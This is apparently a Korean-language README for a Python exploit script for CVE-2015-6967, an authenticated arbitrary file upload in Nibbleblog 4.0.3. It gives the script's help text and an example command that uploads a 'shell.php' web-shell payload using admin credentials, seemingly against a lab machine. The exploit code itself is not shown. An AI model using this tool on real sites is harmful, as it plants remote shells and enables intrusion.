
CVE-2015-6967을 위한 Python 익스플로잇 스크립트로, Nibbleblog 4.0.3에서 인증된 사용자의 임의 파일 업로드를 가능하게 하며 사용자 정의 페이로드를 지원합니다.
Nibbleblog 4.0.3 - 임의 파일 업로드 (CVE-2015-6967)
requestsusage: exploit.py [-h] --url URL --username USERNAME --password PASSWORD --payload PAYLOAD
optional arguments:
-h, --help show this help message and exit
--url URL, -l URL
--username USERNAME, -u USERNAME
--password PASSWORD, -p PASSWORD
--payload PAYLOAD, -x PAYLOAD
예시:
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php